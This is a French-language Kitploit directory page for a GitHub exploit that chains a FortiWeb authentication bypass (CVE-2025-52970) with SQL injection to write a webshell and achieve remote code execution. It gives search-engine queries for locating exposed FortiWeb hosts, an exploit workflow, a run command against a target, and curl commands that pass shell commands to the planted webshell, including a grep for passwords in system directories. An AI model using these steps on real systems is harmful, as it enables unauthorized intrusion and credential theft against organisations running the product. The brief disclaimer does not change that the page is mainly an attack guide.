Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
FortiWeb-CVE-2025-52970-Authentication-Bypass — Démontre un contournement d'authentification dans FortiWeb (CVE-2025-52970) combiné avec une injection SQL pour télécharger un webshell et obtenir une exécution de code à distance via les en-têtes HTTP. | Kitploit
Outils/GitHubGitHub/hex00-0x4/fortiweb-cve-2025-52970-authentication-bypass
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubhex00-0x4/fortiweb-cve-2025-52970-authentication-bypass

FortiWeb-CVE-2025-52970-Authentication-Bypass

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

Démontre un contournement d'authentification dans FortiWeb (CVE-2025-52970) combiné avec une injection SQL pour télécharger un webshell et obtenir une exécution de code à distance via les en-têtes HTTP.

Voir le dépôt
9313il y a 1 anPas encore vérifié
Partager

🚨 Contournement d'authentification FortiWeb → Exécution de code à distance

📌 Présentation

Ce dépôt montre un contournement d'authentification dans FortiWeb qui peut être enchaîné pour réaliser une Exécution de code à distance (RCE).
L'exploit exploite un point d'accès vulnérable pour injecter des charges utiles SQL, télécharger un webshell et exécuter des commandes via des en-têtes HTTP.

⚠️ Avertissement:
Ce projet est à des fins éducatives et de recherche uniquement.
Ne PAS l'utiliser contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.

Netlas, FOFA et Shodan

Screenshot 2025-08-23 131226
root@kitploit:~
((FortiWeb)) AND port:("8443")

### FOFA
title="FortiWeb" && port="8443"

### Shodan
ssl:"FortiWeb" port:8443
http.title:"FortiWeb" port:8443

🔎 Détails de la vulnérabilité

  • CVE: CVE-2025-52970

  • Composant: API Fabric FortiWeb (/api/fabric/device/status)

  • Impact: Contournement d'authentification → Injection SQL → Téléchargement de webshell → RCE

  • Vecteur: En-tête Authorization forgé + injection SQL

🧑‍💻 Workflow de l'exploit

  1. Supprimer et créer une table SQL temporaire.

  2. Écrire la charge utile du webshell par morceaux.

  3. Exporter le shell vers /cgi-bin/x.cgi.

  4. Télécharger un script Python auxiliaire pour déclencher les permissions.

  5. Accéder au webshell en envoyant des commandes via l'en-tête User-Agent.

    ⚙️ Utilisation

1️⃣ Cloner le dépôt

root@kitploit:~
git clone https://github.com/your-username/Fortinet-AuthBypass-Exploit.git
cd Fortinet-AuthBypass-Exploit
python3 exploit.py -t https://TARGET:8443/

Screenshot 2025-08-23 114753 Screenshot 2025-08-23 114915

3️⃣ Interagir avec le webshell

root@kitploit:~
curl -ks -H 'User-Agent: id' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: whoami' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: uname -a' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: grep -ril pass /etc /conf /data 2>/dev/null' https://TARGET:8443/cgi-bin/x.cgi
Screenshot 2025-08-23 114521
Télécharger l’outil